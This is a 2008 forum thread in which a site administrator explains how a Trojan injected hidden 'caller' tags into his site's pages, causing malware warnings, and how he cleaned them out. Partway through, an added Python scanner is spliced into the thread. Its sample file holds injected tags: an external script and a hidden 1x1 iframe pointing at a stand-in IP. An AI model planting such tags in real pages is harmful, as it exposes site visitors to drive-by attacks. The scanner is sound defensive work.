Google Malware...


WinterWarlock
07-06-2008, 11:00 PM
All day, when I try to reach the forum, I get a blocked site, saying Google Analytics has decided the forum is a malicious site. Is anyone else seeing this? I've been skipping past the warning, but I have to do it for every click, and it's a real hassle.

Thanks

Scott

the_swede
07-07-2008, 12:06 AM
Yes, I too see these warnings. I'm not sure by what metrics Google analyzes websites but I figured it may just be based off of advertisers that track users across domains via cookies.

However, this website doesn't have advertising. So perhaps it's been compromised and malicious code was injected into the site. After all, this site does implement well known forum software with published bug exploits.

WinterWarlock
07-07-2008, 12:23 AM
If you follow the link "Why was this site blocked?" it says there were some number of malware/trojan horses found...


I think Tim & Neil have to contact Google to have the site removed from the bad list...

lakeside_cruise
07-07-2008, 08:14 AM
I get the same thing, and still do.

"Reported Attack Site!

This web site at www.adkhighpeaks.com has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners."

It's not my security preference, because it works fine with IE, and my google is set to default setting.

Jay H
07-07-2008, 08:19 AM
Scroll down guys:

http://www.adkhighpeaks.com/forums/showthread.php?t=3104

At least there is info on there.

Jay

the_swede
07-07-2008, 03:40 PM
Ah, that's good news then. I was afraid that someone had hit this forum with some vBulletin bug exploit.

My band's old website ran a fairly known engine that was hit with a silly XSS exploit. It injected javascript into user submitted content viewable from the front page, which caused visitors to automatically be redirected to another website. It wasn't dangerous, just mischievous.

Mavs00
07-07-2008, 03:43 PM
Quote: Originally Posted by lakeside_cruise

"Reported Attack Site!

This web site at www.adkhighpeaks.com has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners."

It's not my security preference, because it works fine with IE, and my google is set to default setting.

ADKHighpeaks is NOT an attack site. It's explained in the link above by Jay H. I am in the process of working with Google on identifying the location of the "suspect" code. Last time it turned out to be some BS <iFrame> tag that was legitimate, but the googlebot flagged it anyway. So far the flagged area is in an old portion of the site totally unaffiliated with the forums.

THERE IS NO SECURITY RISK TO THE FORUM USER.

a BIG PITA that will take a few weeks to sort out, but we will.

lakeside_cruise
07-07-2008, 06:11 PM
Quote: Originally Posted by Mavs00

ADKHighpeaks is NOT an attack site. It's explained in the link above by Jay H. I am in the process of working with Google on identifying the location of the "suspect" code. Last time it turned out to be some BS <iFrame> tag that was legitimate, but the googlebot flagged it anyway. So far the flagged area is in an old portion of the site totally unaffiliated with the forums.

THERE IS NO SECURITY RISK TO THE FORUM USER.

a BIG PITA that will take a few weeks to sort out, but we will.

I know that, I read the post. I just copied and pasted the message that appears in my browser in case it might be of any help to you guys getting it resolved.

Mavs00
07-07-2008, 06:48 PM
I found it................. After a couple hours, and couple beers. I found the offending code............. (after reviewing like 4000 lines of it :rolleyes: ). Long after my eyes started bleeding, I found it and removed it from the site. We are now good to go at this point. I've notified google, who will, I'm sure, take their SWEET A$$ time removing us from the bad boy list. :rolleyes:

Technology is good, and bad......... all at the same time. Grrrrrrrr. I hate that crap.

Anyhow, in due time, we'll be removed............. ONCE AGAIN. Surf without fear.

CaLculAted Risk
07-08-2008, 12:18 PM
FYI. I try to surf the site from work and they use the Barracuda firewall software and this site is blocked there as well.

I'm not sure how barracuda gets their lists of "bad" sites, but you might want to drop them a line as well when things are fixed up...

Mavs00
07-08-2008, 01:15 PM
Actually, those that use virus software might have noticed the issue. There were multiple lines of bad code in there (not in the forums area) that needed to be cleansed.

They are now and google will do another review and update the warning page. Not sure how long that process takes (it took 1 month before). I'm working with my ISP to increase security.

WinterWarlock
07-10-2008, 04:23 PM
Thanks Tim -

Still an issue with Firefox, but IE7 is fine...I guess we wait for Google to deem us worthy of their time.


Scott

Cory D
07-10-2008, 04:41 PM
I never got the message until I upgraded to FF3; now I get hammered with it. I couldn't even get a post through the normal options and can only get it to work with the "quick reply". I'm sure you can turn the option off, but I'm too lazy when I'm not hiking.

Mavs00
07-10-2008, 10:27 PM
Come to find out, I did get hit with a Trojan horse. It was an innocuous one, that did no damage (the damaging .exe part was killed by the host before getting onto the server) however the "caller" codes did get inserted, so it comes up.

Working with the host. The whole site has now been swept and there should no longer be any associated FF issues with the forum (let me know via PM if there are). Google will take their time.

The site is safe to use though at this point. Thanks for your patience.

WinterWarlock
07-10-2008, 10:36 PM
For now, FF still tries to block it, but if you go to Tools-Options-Security you can uncheck the box "Alert me to attack sites"...

Mavs00
07-10-2008, 10:44 PM
Yeah, not sure why that is. The forums have been swept manually and electronically and are clean. I've emailed...... Google about 30 times and requested they review my site. No response yet.

Mavs00
07-11-2008, 08:24 AM
I received the "all clear" from my ISP on the 9th, and the site is totally clean. I'm on now with FF3 and get NO MESSAGES. If you are still getting alerts, hit refresh; you're probably surfing through a "cached" page. FF, unlike Google, looks for codes (general <iframe> or script callers) and when they find them, they flag the site and show the user the warning. Some uses of <iframe> are legit, which is why you get a choice to override it.

I learned A LOT through this process and it should help for the future. I've always been a full disclosure guy, so here is the full deal.

On June 30, one of the million "porno" spammers hit the site and was "granted" membership. Once in, they attempted to infect my ISP home folder with a Trojan horse virus that would distribute porn silently to the masses on the internet (not forum users; it just tried to use my server as an intermediary, like a parasite). It's apparently a two-part process. 1) It inserts 2 lines of code into all site index files that "call" out to a secondary file that it attempts to place in the folder as well (part 2 in the process); this second executable file does the work of the virus. My ISP detected the second part and killed the upload, so the executable part never made it (those files require authorization), but because the inserting of the codes just looks like "me updating files", it allows it.

What happens is that there are all these "caller" codes that call out to nothing (cause the 2nd process didn't take) on many of my pages. Fast forward to FF and IE viewers coming in, and those sites see the "caller codes" and say "oh oh" and warn the user. Once they are removed, the browsers no longer see the code and allow it.

Google, on the other hand, is different..... they send out bots that periodically surf around, and when they hit these codes, it flags the site as "harmful" and notifies me. Now that the site has been cleansed, I put in a re-request to Google and invited the googlebots back to sweep the site. Well, these things are just dummies that stumble around blindly looking for stuff, so when they "stumble" back in, they'll report their findings, which Google will then verify with a Google bombbot that hunts for the codes, and if they are all gone, they remove us from the list..... they say it's a 72 hrs process but we're close to that already and still no update. I do notice that AOL.com.uk, which was successfully targeted and infected the same day (from the same source), is already off the "bad boy" list, so I guess it's a matter of who ya know. :rolleyes:

In spending lots of "quality" time with my ISP Tech Support folks, this is something that is ALWAYS occurring (like I said, AOL UK and 650 other sites got nailed at the same time). My ISP assures me that no users were at risk because this virus 1) just uses us as an intermediary to "spread the porno" Gospel and 2) the important executable portion never got activated.

The object is to catch it at the door, cuz once it starts writing codes, it's a pain to sweep (I went through about 10,000 lines of code in 54 different files to "erase the offending lines"). That is my understanding of what happened and how it was explained to me (last night from 11 PM to 1 AM).

A big PITA. Sorry for any inconvenience and there shouldn't be trouble and google will get around to us at some point.

Look on the bright side: our success and the # of hits this site generates now makes us attractive to the world's internet porno vendors :rolleyes:

Gee, who ever thought "let's start a fun little BB and chit chat among friends" would turn into me being the "code police" sniffing out porno hackers :razz: :D
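The sweep Mavs00 describes above (and the "<iframe> or script callers" he mentions in his earlier post) was done by eye across 54 files. The following is an added example, not code from the forum or the site's own tooling, of how a practitioner would automate that sweep: walk a web root, flag any <iframe> or <script> whose src points off-site or which is 1x1/hidden, and optionally strip the flagged tags while leaving legitimate same-site iframes alone. The hostnames in OWN_HOSTS, the two sample HTML files and the 203.0.113.7 address (RFC 5737 documentation range) are constructed for the example and are not the real injected code.

```python
"""Sweep a web root for injected <iframe>/<script> "caller" tags.

Added example (not the forum's or the site's own code). Flags tags whose
src points off-site, and iframes that are 1x1 or hidden, which is the
shape of the injected caller lines described in the thread. OWN_HOSTS,
the sample HTML and the 203.0.113.7 address are constructed assumptions.
"""
import re
from pathlib import Path
from urllib.parse import urlparse

OWN_HOSTS = {"adkhighpeaks.com", "www.adkhighpeaks.com"}  # assumed own hostnames

# An opening <iframe>/<script> tag, optionally followed by its closing tag on the same line.
TAG_RE = re.compile(r"<(iframe|script)\b([^>]*)>(\s*</\1\s*>)?", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
DIM_RE = re.compile(r"""(width|height)\s*=\s*["']?(\d+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)

# Constructed sample: a clean page with a legitimate same-site iframe ...
CLEAN_INDEX = """<html><head><title>ADK High Peaks</title></head>
<body>
<a href="forums/">Forums</a>
<iframe src="/old/map.html" width="300" height="200"></iframe>
</body></html>
"""

# ... and the same page with two injected "caller" lines (external script + hidden 1x1 iframe).
INFECTED_INDEX = """<html><head><title>ADK High Peaks</title>
<script src="http://203.0.113.7/cgi-bin/x.js"></script></head>
<body>
<a href="forums/">Forums</a>
<iframe src="http://203.0.113.7/in.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>
"""


def suspicious_reasons(tag, attrs, own_hosts):
    """Return the reasons a single tag looks like an injected caller ([] if it looks legitimate)."""
    reasons = []
    m = SRC_RE.search(attrs)
    if m:
        host = urlparse(m.group(1)).hostname  # None for relative paths such as /old/map.html
        if host and host.lower() not in own_hosts:
            reasons.append(f"external {tag} source {host}")
    if tag == "iframe":
        dims = [int(v) for _, v in DIM_RE.findall(attrs)]
        if dims and all(v <= 1 for v in dims):
            reasons.append("1x1 iframe")
        if HIDDEN_RE.search(attrs):
            reasons.append("hidden iframe")
    return reasons


def scan_text(text, own_hosts=OWN_HOSTS):
    """Return [(line_no, tag, reasons)] for every suspicious tag in `text`."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in TAG_RE.finditer(line):
            tag = m.group(1).lower()
            reasons = suspicious_reasons(tag, m.group(2), own_hosts)
            if reasons:
                findings.append((line_no, tag, reasons))
    return findings


def remove_flagged(text, own_hosts=OWN_HOSTS):
    """Strip flagged tags (with a closing tag on the same line); keep everything else intact."""
    def keep_or_drop(m):
        tag = m.group(1).lower()
        return "" if suspicious_reasons(tag, m.group(2), own_hosts) else m.group(0)
    return "\n".join(TAG_RE.sub(keep_or_drop, line) for line in text.splitlines())


def scan_tree(root, own_hosts=OWN_HOSTS, suffixes=(".html", ".htm", ".php")):
    """Walk a web root and return {path: findings} for files that contain suspicious tags."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(errors="replace"), own_hosts)
            if hits:
                report[str(path)] = hits
    return report


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as d:  # stand-in for the web root
        Path(d, "index.html").write_text(INFECTED_INDEX)
        Path(d, "old").mkdir()
        Path(d, "old", "index.html").write_text(CLEAN_INDEX)
        for path, hits in scan_tree(d).items():
            for line_no, tag, reasons in hits:
                print(f"{path}:{line_no}: <{tag}> {', '.join(reasons)}")
```

Run it against a copy of the document root rather than the live files, review the report, and only then apply remove_flagged; the allowlist is what keeps legitimate same-site iframes (the kind the googlebot previously flagged) out of the results, so set OWN_HOSTS to every hostname the site legitimately serves from.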

Mavs00
07-11-2008, 11:21 AM
Google has seen fit to sound the "ALL CLEAR (http://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENUS247&q=adkhighpeaks&btnG=Google+Search)"